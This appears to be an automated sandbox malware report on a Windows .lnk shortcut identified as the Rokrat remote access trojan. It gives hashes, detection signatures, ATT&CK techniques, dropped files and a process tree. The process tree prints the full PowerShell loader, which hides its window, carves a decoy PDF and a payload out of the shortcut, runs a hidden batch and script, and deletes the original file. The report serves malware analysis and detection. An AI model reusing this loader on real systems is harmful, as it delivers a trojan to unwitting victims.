Analysis

  • max time kernel
    118s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    23-02-2024 05:35

General

  • Target

    cbc777d1e018832790482e6fd82ab186ac02036c231f10064b14ff1d81832f13.lnk

  • Size

    52.0MB

  • MD5

    acf4085b2fa977fc1350f0ddc2710502

  • SHA1

    7155d89bae9acd67f5d8cdf651b73ee6b54262c3

  • SHA256

    cbc777d1e018832790482e6fd82ab186ac02036c231f10064b14ff1d81832f13

  • SHA512

    4aa010f680485f0241cbaff77d3a21509e2f73c4fdfe1940aa63f46949fcb39404e4a2c543c465098806b7059fab234de48fe9996ba1edd9c4a9b7b6ca1dbe70

  • SSDEEP

    24576:0Zthnqtka+Dj8bI6c94TuDjoZgRXTTYdy830QtO0oIJjW7sFAc1Mh5D2y8:U9OQj85c91wZgjbaJa7d2y8

Score
10/10

Malware Config

Signatures

  • Detect Rokrat payload 2 IoCs
  • Rokrat

    Rokrat is a remote access trojan written in c++.

  • Blocklisted process makes network request 5 IoCs
  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\cbc777d1e018832790482e6fd82ab186ac02036c231f10064b14ff1d81832f13.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2816
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a "$t1 = 'user32.dll';$t = 'using System; using System.Runtime.InteropServices; public class User32 {[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ', SetLastError = true)]public static extern IntPtr FindWindow(string lpClassName, string lpWindowName);[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ')] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); }'; Add-Type -TypeDefinition $t;$proName = 'powershell.exe'; $cmdMainWindowHandle = [User32]::FindWindow([NullString]::Value, $proName);[User32]::ShowWindow($cmdMainWindowHandle, 0);$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x03401DD6} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000162C, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x0007EEC5;$lnkFile.Read($pdfFile, 0, 0x0007EEC5);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x000804F1,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'public.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x001598F3,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005AA;$lnkFile.Read($stringByte, 0, 0x000005AA);$batStrPath = $env:temp+'\'+'temp.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x00159E9D,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'working.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"&& exit
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      PID:2444
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
        3⤵
          PID:2552
        • C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$t1 = 'user32.dll';$t = 'using System; using System.Runtime.InteropServices; public class User32 {[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ', SetLastError = true)]public static extern IntPtr FindWindow(string lpClassName, string lpWindowName);[DllImport(' + [System.Text.Encoding]::UTF8.GetString(34) + $t1 + [System.Text.Encoding]::UTF8.GetString(34) + ')] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); }'; Add-Type -TypeDefinition $t;$proName = 'powershell.exe'; $cmdMainWindowHandle = [User32]::FindWindow([NullString]::Value, $proName);[User32]::ShowWindow($cmdMainWindowHandle, 0);$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x03401DD6} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000162C, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x0007EEC5;$lnkFile.Read($pdfFile, 0, 0x0007EEC5);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x000804F1,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'public.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x001598F3,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005AA;$lnkFile.Read($stringByte, 0, 0x000005AA);$batStrPath = $env:temp+'\'+'temp.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x00159E9D,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'working.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"
          3⤵
          • Deletes itself
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2688
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\m-j0bd-s.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2512
            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
              C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES515C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC514B.tmp"
              5⤵
                PID:1164
            • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
              "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\cbc777d1e018832790482e6fd82ab186ac02036c231f10064b14ff1d81832f13.pdf"
              4⤵
              • Suspicious behavior: GetForegroundWindowSpam
              • Suspicious use of SetWindowsHookEx
              PID:2740
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Temp\working.bat""
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2496
              • C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden "$stringPath=$env:temp+'\'+'temp.dat';$stringByte = Get-Content -path $stringPath -encoding byte;$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$scriptBlock = [scriptblock]::Create($string);&$scriptBlock;"
                5⤵
                • Blocklisted process makes network request
                • Checks BIOS information in registry
                • Drops file in Windows directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2092
                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
                  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gwhtjuac.cmdline"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1188
                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES94E1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC94E0.tmp"
                    7⤵
                      PID:1444
                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
                    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\h1z2keqk.cmdline"
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1344
                    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES95EA.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC95E9.tmp"
                      7⤵
                        PID:2116
                    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
                      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\__bu2wbk.cmdline"
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1104
                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES96F3.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC96F2.tmp"
                        7⤵
                          PID:2856
                      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
                        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bpao_qcj.cmdline"
                        6⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3064
                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
                          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES97AE.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC97AD.tmp"
                          7⤵
                            PID:1864

              Network

              MITRE ATT&CK Matrix ATT&CK v13

              Discovery

              Query Registry

              1
              T1012

              System Information Discovery

              2
              T1082

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\CabAF16.tmp
                Filesize

                65KB

                MD5

                ac05d27423a85adc1622c714f2cb6184

                SHA1

                b0fe2b1abddb97837ea0195be70ab2ff14d43198

                SHA256

                c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

                SHA512

                6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

              • C:\Users\Admin\AppData\Local\Temp\RES515C.tmp
                Filesize

                1KB

                MD5

                8bf99214838315f076926a949ce86d25

                SHA1

                8d15322dbf9c931a45adab3357c1fe940de78720

                SHA256

                10fe3685384a340c4ddfdf6d2585e8540e68ad33ce72abdaa7055f1c874ea43d

                SHA512

                524f9095a7af2cf90b7a2e36590cb0fe84aec93d67d74560fe7c0e18a2b5f8bf87258c743045fcc34f86e81f720a508f39b17dbccba59cbc12fea56cd5ca7a38

              • C:\Users\Admin\AppData\Local\Temp\RES94E1.tmp
                Filesize

                1KB

                MD5

                60683aa688ac0937e916fe5613966b4d

                SHA1

                d213ce30b5a64bf0fb875938c4a8bd1caee6852f

                SHA256

                9ff6fff97d7cd254662719770ce5971f9953433afd16bd646ed28046e5d3dd3b

                SHA512

                ad8b77507ceb77782e6f1ec59d86378c09ff98ba71b764c24a67f34949c1d247a5bd1550b0c067ed79c965d6e879b63707220392e5dc2af99d382fc127f16d47

              • C:\Users\Admin\AppData\Local\Temp\RES95EA.tmp
                Filesize

                1KB

                MD5

                cfb3395239ba358ef410f6923580c93c

                SHA1

                fe9b2492ff0fbce359c3c98fc0b574069175dc28

                SHA256

                82f1dbe22b1f2b02c2b3765b8096cdeb395f8490be58dc30c18135e6e2b9ce92

                SHA512

                4fa52b9aa47ed928c34ffcc5f4552245e6aed6d9922c304f1aa85399af56d26b241cb8d96c7655c55bfd85aabe45cd23c77429db155c8514b1d2e76d49b37db4

              • C:\Users\Admin\AppData\Local\Temp\RES96F3.tmp
                Filesize

                1KB

                MD5

                06ba0c2c28914f0773404a8e9b9a0d54

                SHA1

                7157f4765ecf59b4d827f73d851b032c6fa58606

                SHA256

                bde51535e6e8c1af9c9409ed2933f4120f6ede1e6971f3843262f927ea5e67d6

                SHA512

                ea52273deb0e49bc88ccbca91ec04ed6b25da7c380cfd0be55a7374bd6b737f7c061f4bc3e86d4252ce93532fa63682df6be0d648e237e98d1f3367330d3a7db

              • C:\Users\Admin\AppData\Local\Temp\RES97AE.tmp
                Filesize

                1KB

                MD5

                49ee8357528c0544db82fd01f6ff25fb

                SHA1

                3445511a68d5380d8a86061b12473c95694f21ee

                SHA256

                0907be302b28d1fc4ea4ce5a24b8474d030112e2096ee6ee00d3954ff48365a3

                SHA512

                d723188c5725ffe66749921cc62914aa596a5c4d092d4fd854dcf1e980a31b2f44c100e2c4d1e9d856878aaf080472c8b2739d467971902cd0c9114d792408dd

              • C:\Users\Admin\AppData\Local\Temp\TarAF48.tmp
                Filesize

                171KB

                MD5

                9c0c641c06238516f27941aa1166d427

                SHA1

                64cd549fb8cf014fcd9312aa7a5b023847b6c977

                SHA256

                4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

                SHA512

                936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

              • C:\Users\Admin\AppData\Local\Temp\__bu2wbk.dll
                Filesize

                3KB

                MD5

                1e9eac8fa167813fe4dcc2627066943f

                SHA1

                ff7412ce102754b35dce031e6de165f7aa54c084

                SHA256

                48de844dd066de6a36d8c349af1c6fddd254ff0c824ad32bb43d05d43762f426

                SHA512

                2ef1e4a0a0e68ee9d065e792e2374cd9ed39e1f1478c2c7d6606654a6ac7764f080a14df7b49a4b986054ec720e5902bdf09b6104222f6c8f1c63551a52354ab

              • C:\Users\Admin\AppData\Local\Temp\__bu2wbk.pdb
                Filesize

                7KB

                MD5

                5584e4a1980954086da28f2f163d8da8

                SHA1

                846ceb503d206e848b8b9683cc02a3c3a046007f

                SHA256

                ea06ec62b938806d09dcfd9b4bb3b2681a5b600907645d3a11b021f9a0648c8b

                SHA512

                616207491d47fee679243ea0da2c9ed1f32bdca94c740b0e65e6719fcdb8f7e8b274e145478ee1a59b35edeec26cff68da3dcdb4ec9557e57ee8007c378dcd95

              • C:\Users\Admin\AppData\Local\Temp\bpao_qcj.dll
                Filesize

                3KB

                MD5

                e02f7a14497ade90cbc060fa52e144a3

                SHA1

                58a9931227f56f8157d113ccd8e49833c4a070a2

                SHA256

                ad909a57f6af9b37afd3dee4cd8b54b015c0a43a735d3f164ef89c2f4cd67e2a

                SHA512

                a2298422ff51b0a560f59a075875258c5bc54a2fc16070a0cbadd4e140d36dcb5dbd0370dea1d341bca2196830db7f775c363606b7e5fdb32e1c84f91dc03910

              • C:\Users\Admin\AppData\Local\Temp\bpao_qcj.pdb
                Filesize

                7KB

                MD5

                d9701e5c7b379a7a055a7ca0515d4542

                SHA1

                cdfb0f94ea4ce97e00cdff0e0fcbb02834f3cc90

                SHA256

                8d414c887db22abb5758df5aa4a6d7d9164222d069191f9a7b537ec5f51558de

                SHA512

                f50f9be20b114c2342f456eb002ea699eb6790f16fd96c0a431f9c1c1608760d0eccd27f8a1b2894837ae28aae7f7537dc93d3e121ac812fda66d54a1a25d284

              • C:\Users\Admin\AppData\Local\Temp\cbc777d1e018832790482e6fd82ab186ac02036c231f10064b14ff1d81832f13.pdf
                Filesize

                507KB

                MD5

                4de5eec4a8b227b451b7209d7ec1f0f4

                SHA1

                e5d41b955fcd2b2187d63e17246db392c16612a8

                SHA256

                14e507f2160b415d8aae1bbe4e5fbcf0a10563a72bb53b7d8a9fc339518bc668

                SHA512

                d523736cd2238c49e9b2ca6da284180772959a39bf8524f6c227013630c7dd030f61a40e64722c2540225231985435838ee4c584474b33ede2cfc1c4671c17b1

              • C:\Users\Admin\AppData\Local\Temp\gwhtjuac.dll
                Filesize

                3KB

                MD5

                c1e5244b2f033ab0d1f8bef49eff963c

                SHA1

                98f647def9985ce76dab0992a9be9285e24a2121

                SHA256

                5acdd1df781617d10cb3bd0f9a5c203dad11646371f542c9b026a5bf057f0185

                SHA512

                9d3a056db3cadc83fd6f99794afeae8b46bc81b9f7c9f4aee452ed4fe2e2c13e56fbb85d04ab01915f66e8875ba729525507baba9d7ae33790c38b859bfa8f4c

              • C:\Users\Admin\AppData\Local\Temp\gwhtjuac.pdb
                Filesize

                7KB

                MD5

                5efc2bde3028120540a63c01b7f05ed9

                SHA1

                199ff8b7c3c42c24794ddd97e46536a6347d1a12

                SHA256

                c637b31bebf50e10b152f34258cadecbe3ec78fe5ad292ab37ff6cba3b934dae

                SHA512

                a55ad9b813fc9bff58e48439d774ed5565323e249c5f46f328f5443d5675fdfacc9e6caf3b12ff0090e6e275e3991145ad8dd21c1c867fbe91a298dac94bf69f

              • C:\Users\Admin\AppData\Local\Temp\h1z2keqk.dll
                Filesize

                3KB

                MD5

                269b21820f2a0cb6a9e1750758e360fd

                SHA1

                684e7378e11b5e53de9e6db8907e940c9ec1e063

                SHA256

                41a24885bd2a0d988742fb4b7b8ba63126428f9e38eac00206d7451818197064

                SHA512

                dd5f6a773820d75b788d81913de9f8b5d0983c0267e857725f4d923b5aa7c57337c302872c5562cd79b5df190245122020ed0b9207b516b26b1ff79eb118eac3

              • C:\Users\Admin\AppData\Local\Temp\h1z2keqk.pdb
                Filesize

                7KB

                MD5

                d4403f9fd72617e709bd817788c17f98

                SHA1

                1d0181dd55c0487d3acff463c3b03bd81355f775

                SHA256

                a477a7d8116903880b66726a2b58dcf5e0a277389472c9f5365dcc3f714b0a99

                SHA512

                71eda04165c172a84a407daa91848e2fce55dd0daddec5339d2c665e31d31eab932d9fd7ed259e4065acbff8c9a1d0bb4bf0d60aef5b52e7b9d2c34397104723

              • C:\Users\Admin\AppData\Local\Temp\m-j0bd-s.dll
                Filesize

                3KB

                MD5

                c40f578e49d36e3b6debba74bb9a1148

                SHA1

                e309c5f6e1db74e87526732bc0d33500621f6487

                SHA256

                4af6ce293163b37a2979bee827943bb1ae00528c8877235fb73983cceaaaee8a

                SHA512

                50e863d6b514546ecccdbc4738580cb47862a2fe7eec6b5785dff2bf291fce6e1ab2ae5c4b64391e6e5e582762dec8497907d32dd0d41215f0f0a280079826ff

              • C:\Users\Admin\AppData\Local\Temp\m-j0bd-s.pdb
                Filesize

                7KB

                MD5

                e1d8a8679f1b17b4f42111799b5f8855

                SHA1

                9a0ce7e786a200e5453b2bcff839b9758f08311b

                SHA256

                55f4dea9b0fd3a5efb07e0ad80a6d5a6584f134af7f29f7f6bd872120578dfc6

                SHA512

                57ae9d6572ffa7a1dd007e52d97deae69dd8b503fb52ae5ad2bbd55cdac2904c7c458cee1ff817cc5aa5031ca407ca9f2c7c7e4934587d1a553d854e0c516f3c

              • C:\Users\Admin\AppData\Local\Temp\temp.dat
                Filesize

                1KB

                MD5

                78480139d86520ba82766c5b3c9a7479

                SHA1

                436e5aa0ef8c97a0b78a4289d19860c1ab8c1f1a

                SHA256

                85438bc7af4c48130c1fd51f8a02eb13b8d57b983411b15fa7f03a302e8e6d8c

                SHA512

                bc5ce718cf3330ab56a131e874785bd86eef4aa19281d3225401f9e33b798dac6cb6e3e58ba2780d9f3a223a7e16e50f1f64a01d03e1b6e78ea56778cfd449d6

              • C:\Users\Admin\AppData\Local\Temp\working.bat
                Filesize

                311B

                MD5

                a1640eb8f424ebe13b94955f8d0f6843

                SHA1

                8551e56c3e19861dbcae87f83b6d0ab225c3793d

                SHA256

                6c0b21b211ba77b42631e1a2a010f858b8664a8bd0149573596a8cdd72e7c399

                SHA512

                6b40b95ac1979a81ed44f991375dc94fda64b872c79c18111d72210a24867811d925acae4b87d378bd9f1adc86cb9adcf359ff873be7e4579869bd7418d466c8

              • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
                Filesize

                3KB

                MD5

                60320b0b02a30944185bcb6bc7b88fec

                SHA1

                2f1335c7e2aebb6df84208ae81ac7ec412b64122

                SHA256

                3cf6b9f17c8e8cd3f4e253810392a08895775a40ed99a822e4448c68ceaaa7fb

                SHA512

                825575c645d57e5b1af8dae347cfe043ac26f5d9deaa9ae9ec5a2765ce9ac3d787b29b8aa63e96b0f6a4fae0ede1f6edac37d7f17b38169b5168a37a60382871

              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SF2S5K3OI83TV67BZ09H.temp
                Filesize

                7KB

                MD5

                2c8c662815eaaea38d3dee8ad7f3ef02

                SHA1

                81a7739cca76695b42fe55a7e9a4f6ab2426d628

                SHA256

                3bc06df27e98c635839d99eec3943cab3015ad102497f26503e29ed0cca11a8c

                SHA512

                fb55ceece1522b797b00826fe52414223d5655d996cc7ae520a9d0c7d58efd42d37f44cd067785d1be296ffc5a13d63f74ff5608523fbaff5a8ce18a7a9d627e

              • C:\Users\Public\public.dat
                Filesize

                869KB

                MD5

                9417ce8a0c32566089345659cbb67cbc

                SHA1

                3210434166466265e1c46321a395500229357fd2

                SHA256

                f3d98b1638dbe6fd0f97ae3b1d2c9d5c0f592baa1317c862042e5201a1e14aed

                SHA512

                fade97b0c65a693ed4aa270debb5604cee76f64a178e45a65ea71ac9e327bac153356960f229591035754f11cbc4bfea78531cb6a74a3320ce40779a352fd24f

              • \??\c:\Users\Admin\AppData\Local\Temp\CSC514B.tmp
                Filesize

                652B

                MD5

                37382c1d939770685b395a0061d73edf

                SHA1

                ccd49e56aa351a261c0fcc52d9a8f224444bcaf9

                SHA256

                ca185b3c277145afc13164265b2f8dbe7e7798846f068c06bab72b7c10708069

                SHA512

                e84c757d95f67e2fa46f8774283cd6131190fe9c0a84f6ca9fa037b310cc7d7ecd118f86436867bd1b4fa0a7a57e27ed515cce9997aee0b1373ea42e586030b4

              • \??\c:\Users\Admin\AppData\Local\Temp\CSC94E0.tmp
                Filesize

                652B

                MD5

                b058fecdb11fce2da4b0923acb5af6aa

                SHA1

                b86a1532e9784a0d6061e86431afe4c0931f804e

                SHA256

                2925bc23dd669cc43ee5ec80b609a4d58e64d92a77ec65be5b170ee2f2e7c199

                SHA512

                01f3e735128b8dfb130170c9ddd79db93a2c5e1995f9cedabfc316231f619c70af202f6e7b1f809551f77cc216595e7b6d9c4a3d5490b6483cc130a3a1820795

              • \??\c:\Users\Admin\AppData\Local\Temp\CSC95E9.tmp
                Filesize

                652B

                MD5

                5ffbbfb34c919371e12cf771478501b0

                SHA1

                55d4b8e70100c1cc646c5bec63cfca8d9fc66d43

                SHA256

                d7471fce5b9616518dccde3dd8ddb757349205bc08ef0d94c2eaf67642c6ad7d

                SHA512

                758bdbf41ca33d01064d6049fca6b793c9399986bdc3769c5818347bc85bb76219391d62130cca732ac2a3a09ca06c5f89805df9fcfd9d9d129dec51037f9f8f

              • \??\c:\Users\Admin\AppData\Local\Temp\CSC96F2.tmp
                Filesize

                652B

                MD5

                4470428ed02ab5af166af2b3d28f0a7f

                SHA1

                bdeb63f856ed02229785a09c4b5c407fdc36e4ca

                SHA256

                dc300e69e9e97f4295f77923fb4aa3ce999e9913b375fbc026b27089fcee6b36

                SHA512

                95844dfb26c6592c6431dba3610f2a794c41ea510b76cfc7538cf502929797495d7ae5aea7fc7b7a030484bdcaa77546bc6f858df553ac9bae2b1b13fa782c35

              • \??\c:\Users\Admin\AppData\Local\Temp\CSC97AD.tmp
                Filesize

                652B

                MD5

                e4b65c3c8172eb56971c2d0aef3218b1

                SHA1

                d4f60de563f48ceba65e4672d3185beac0b0bfa4

                SHA256

                f187f7cc98adf17ffa5d8442e4f0b838c86d04253e0404a2e0a564dd25cc4681

                SHA512

                5aad625a4a6597b83ea7c1e0e45161fa451ea545e6f55bfa2f1565eb3056da7c88e76716a0b7652da8a554a22e9014cbabb98abc9fd9492779a60147dcea0813

              • \??\c:\Users\Admin\AppData\Local\Temp\__bu2wbk.0.cs
                Filesize

                286B

                MD5

                b23df8158ffd79f95b9bddd18738270b

                SHA1

                79e81bb74bc53671aeabecae224f0f9fe0e3ed7f

                SHA256

                856bded4416dd1595613354334ad1d3e5c4922a86102786429bcdb0e7f798882

                SHA512

                e23822d5b9a32d7fc705b772ef43bcb336e201ec9c1d2507a530e8b1b383b0727c0b53b92e881a953527e7b2ffb485e24c1161834c9380d1bb7498eac7e4a67f

              • \??\c:\Users\Admin\AppData\Local\Temp\__bu2wbk.cmdline
                Filesize

                309B

                MD5

                dbba00399286dab84fb4327c50f32d9e

                SHA1

                b0f708601b6e728f78a9f02f58a2025196c39ca1

                SHA256

                2c623d51433c015288cb24a0c8b6241ac5b16c90ce181dbefb45a54b660f3b9e

                SHA512

                a054dae19f1a15b540d391de43166ffbaeda0cf4fc545591d86af688514564baf443b3d9ee43864aae8ea44547cf9638d122a9fd4b175cefb9da68ead353db7d

              • \??\c:\Users\Admin\AppData\Local\Temp\bpao_qcj.0.cs
                Filesize

                259B

                MD5

                560e1b883a997afcfa3b73d8a5cddbc1

                SHA1

                2905f3f296ac3c7d6a020fb61f0819dbea2f1569

                SHA256

                e5231270257f1727ca127b669a7c21d46ced81cd5b46e89c48dd8304c1185bea

                SHA512

                041dd231b93708d4ad65580ea0fa7cff34a9a43ff8d3ae45b631a381e01dc286607aec05b1aade537818d068ca0b576cac613fde626d60eb2e4e6c3c0f525635

              • \??\c:\Users\Admin\AppData\Local\Temp\bpao_qcj.cmdline
                Filesize

                309B

                MD5

                ddbcf042d1996b46b8b3e97813d1272d

                SHA1

                80a6e564d3d87a9c4d85487508105bfbef49e132

                SHA256

                d1664caf1a408e6fe814fd084561339b287e5a561cd285cbdb18109050cce6ec

                SHA512

                eec268922f8d208780fb34f92370c6cf0f73a7f26f0af6ef67559436904c49697ab7b7c0b2ba54079ea26ee7ca68e84d4d410b72b88dfd6839e5067df86ee02f

              • \??\c:\Users\Admin\AppData\Local\Temp\gwhtjuac.0.cs
                Filesize

                249B

                MD5

                69ecfeb3e9a8fb7890d114ec056ffd6d

                SHA1

                cba5334d2ffe24c60ef793a3f6a7f08067a913db

                SHA256

                0a913fd594ad2da3159400fc3d7d2cc50b34f8f31675ec5ac5a41d7e79e9fd58

                SHA512

                be7eb5a6a8bcc7f279aee00ad650aa872fc7fc08227eedeb9cc0a4273f0382b91306f60878728eaba3c79fa8c96066b144ecea897360a11be38996f04fdd99e1

              • \??\c:\Users\Admin\AppData\Local\Temp\gwhtjuac.cmdline
                Filesize

                309B

                MD5

                2904af9a4702b5167f3fd853ce5c7643

                SHA1

                33c5242f4211e6800cab6e798186c7bd2315fc50

                SHA256

                8ae8fe735e39a706e5dd06608b38eae1b69802c9b02fa694f2afa05373e121cc

                SHA512

                3206580a30036ffe93f268cf64d7b797f9ca8a733e4974b6e19a1559aca876a9f61d7b8277573d52b52b18ffcfc1b2d71c5963ba573128c1311132a120385dc8

              • \??\c:\Users\Admin\AppData\Local\Temp\h1z2keqk.0.cs
                Filesize

                272B

                MD5

                4de985ae7f625fc7a2ff3ace5a46e3c6

                SHA1

                935986466ba0b620860f36bf08f08721827771cb

                SHA256

                53d5aecb149a00bc9c4fac5feb8e5feddf5c83986c12d5fef1c3ddd104b09004

                SHA512

